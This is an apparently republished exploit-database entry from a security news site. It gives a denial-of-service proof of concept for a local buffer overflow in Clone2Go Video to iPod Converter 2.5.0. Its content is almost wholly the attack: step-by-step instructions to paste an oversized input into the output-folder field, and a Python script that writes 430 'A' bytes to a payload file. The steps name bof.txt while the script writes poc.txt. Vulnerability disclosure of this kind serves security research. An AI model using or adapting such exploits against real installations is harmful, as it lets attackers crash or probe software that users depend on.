Clone2Go Video to iPod Converter 2.5.0 - Denial of Service (PoC)
|
来源:vfocus.net 作者:ZwX 发布时间:2018-09-14
|
|
# Exploit Title: Clone2Go Video to iPod Converter 2.5.0 - Denial of Service (PoC) # Exploit Author: ZwX # Exploit Date: 2018-09-11 # Vendor Homepage : http://www.clone2go.com/ # Software Link: http://www.clone2go.com/down/video-to-ipod-setup.exe # Tested on OS: Windows 7 # Proof of Concept (PoC): # The local buffer overflow vulnerability can be exploited by local attackers with # restricted system user account without user interaction. For security demonstration # or to reproduce follow the provided information and steps below to continue. # Manual steps to reproduce the vulnerability ... # 1 Install the software and start the client # 2 Copy the AAAA...string from bof.txt to clipboard # 3 Run VideoConverter.exex # 4 Go Menu Menu > Edit > Options > Set Output folder (Input) # 5 Paste it the input AAAA....string and click Open # 6 A messagebox opens click ok # 7 Software will stable crash or shut down # 8 Successful reproduce of the Denial of Service #!/usr/bin/python buffer = "\x41" * 430 poc = buffer file = open("poc.txt","w") file.write(poc) file.close() print "POC Created by ZwX"
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|